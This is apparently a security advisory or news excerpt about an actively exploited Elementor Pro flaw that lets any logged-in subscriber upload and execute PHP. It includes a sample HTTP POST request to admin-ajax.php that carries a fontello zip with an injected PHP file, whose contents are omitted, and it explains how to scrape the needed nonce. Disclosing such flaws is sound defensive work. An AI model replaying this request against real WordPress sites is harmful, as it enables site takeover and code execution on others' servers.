According to Jerome Bruandet, from NintechNet, the vulnerability, currently exploited by attackers, allows any logged-in user to upload and execute PHP scripts on the blog. Chloe Chamberland from Wordfence also confirmed the issue and added that “This vulnerability is being used in conjunction with a vulnerability in Ultimate Addons for Elementor that allows for subscriber registration.”
The following is a sample post where zip_upload can contain a fontello generated zip file with an injected php file. A legitimate nonce can be scraped from the page source of /wp-admin once authenticated as a subscriber for the _nonce field.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
Content-Length: 38005
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryczB4AfBdfz6AZDaF
Origin: http://elementorvuln.vhx.cloud:8080
Referer: [url]/wp-admin/post-new.php?post_type=elementor_icons
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
Connection: close
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="zip_upload"; filename="fontello-c6dc39d0.zip"
Content-Type: application/zip
**omitted this for brevity***
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="actions"
{"pro_assets_manager_custom_icon_upload":{"action":"pro_assets_manager_custom_icon_upload","data":{"post_id":"1"}}}
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="_nonce"
5052d6f053
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="action"
elementor_ajax
------WebKitFormBoundaryczB4AfBdfz6AZDaF———